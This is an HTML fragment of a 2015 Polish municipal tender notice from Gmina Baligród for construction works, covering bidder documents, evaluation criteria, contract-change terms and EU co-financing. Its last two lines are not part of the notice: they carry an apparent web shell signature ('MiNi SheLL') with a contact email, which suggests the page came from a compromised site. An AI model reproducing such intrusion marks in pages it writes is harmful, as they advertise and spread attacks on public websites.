<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	wypełniony i podpisany formularz oferty zgodny z treścią SIWZ (wzór stanowi załącznik Nr 1 do niniejszej SIWZ); b)	kosztorys ofertowy; c)	w przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia do oferty dołączone powinno być pełnomocnictwo w oryginale; d)	pisemne zobowiązanie - w przypadku polegania na zasobach innych podmiotów na podstawie art. 26 ust. 2b ustawy Pzp; e) dowód wpłaty wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 94</li>
<li>2 - Okres gwarancji jakości na wykonane roboty ponad założony obligatoryjny okres gwarancji 36 - 6</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ust. 1 Ustawy Pzp, Zamawiający informuje, że dopuszcza możliwość zmiany postanowień umowy zawartej z Wykonawcą wyłonionym w toku niniejszego postępowania w przypadku:  a) wad w dokumentacji projektowej przekazanej przez Zamawiającego, b) zawieszenia robót przez Zamawiającego, z przyczyn za które nie odpowiada Wykonawca, c) wystąpienia nieprzewidzianych warunków atmosferycznych lub hydrologicznych, które nie pozwolą na realizację robót budowlanych zgodnie z zasadami sztuki budowlanej, d) koniecznych lub racjonalnych zmian w dokumentacji projektowej, e) zmiany urzędowej stawki podatku od towaru i usług VAT. 
Zmiana musi być wprowadzona w formie pisemnego aneksu pod rygorem nieważności;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.baligrod.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Baligród, Pl. Wolności 13, 38-606 Baligród.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.02.2015 godzina 09:00, miejsce: Urząd Gminy Baligród, 38-606 Baligród, Pl. Wolności 13. Sekretariat I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Inwestycja współfinansowana ze środków Europejskiego Funduszu Rolnego na rzecz  Rozwoju Obszarów Wiejskich na lata 2007-2013; w ramach Programu, oś 3 Jakość życia na obszarach wiejskich i różnicowanie gospodarki wiejskiej, działanie 321  Podstawowe usługi dla gospodarki i ludności wiejskiej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com